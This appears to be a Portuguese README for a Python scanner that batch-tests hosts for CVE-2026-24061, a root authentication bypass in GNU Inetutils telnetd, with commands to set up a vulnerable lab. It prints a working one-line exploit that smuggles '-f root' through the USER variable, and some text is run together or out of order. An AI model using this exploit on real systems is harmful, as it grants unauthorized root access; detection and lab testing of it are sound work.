
Scanner baseado em Python que detecta a CVE-2026-24061 no GNU Inetutils telnetd, permitindo testes em lote de múltiplos alvos para a vulnerabilidade de bypass de autenticação.
⚠️ Aviso:
CVE-2026-24061GNU Inetutils é um conjunto clássico de ferramentas de rede fornecido pelo projeto GNU, que inclui o serviçotelnetd, ou seja, o daemon do servidor Telnet. Nas versões 1.9.3 a 2.7, o serviçotelnetdapresenta uma falha crítica no fluxo de autenticação de usuários. Ao chamar o programa de login do sistema/usr/bin/login, o serviço não filtra nem valida adequadamente a variável de ambienteUSERenviada pelo cliente. Um atacante pode definir um valor específico para a variávelUSER, injetando diretamente o parâmetro-fno comandologin. O parâmetro-fdo programa é usado para "pular a autenticação secundária", o que permite ao atacante contornar completamente todos os mecanismos de verificação de senha e estabelecer uma sessão remota diretamente como usuário , obtendo assim o controle máximo do servidor. Essa vulnerabilidade é extremamente perigosa, equivalente a um backdoor remoto de root público, sem necessidade de qualquer credencial.
loginrootUSER='-f root' telnet -a <target_ip>

python3 cve-2026-24061.py -i 10.10.168.128
python3 cve-2026-24061.py -f targets.txt
O comando acima define a variável de ambiente USER como -f root. Quando o serviço telnetd vulnerável recebe a conexão, ele constrói e executa uma chamada de sistema semelhante à seguinte:
sudo apt update
sudo apt install openbsd-inetd inetutils-telnetd telnet -y
sudo sed -i 's/^#telnet/telnet/' /etc/inetd.conf
sudo systemctl restart openbsd-inetd
sudo ss -tuln | grep ':23'
telnet localhost 23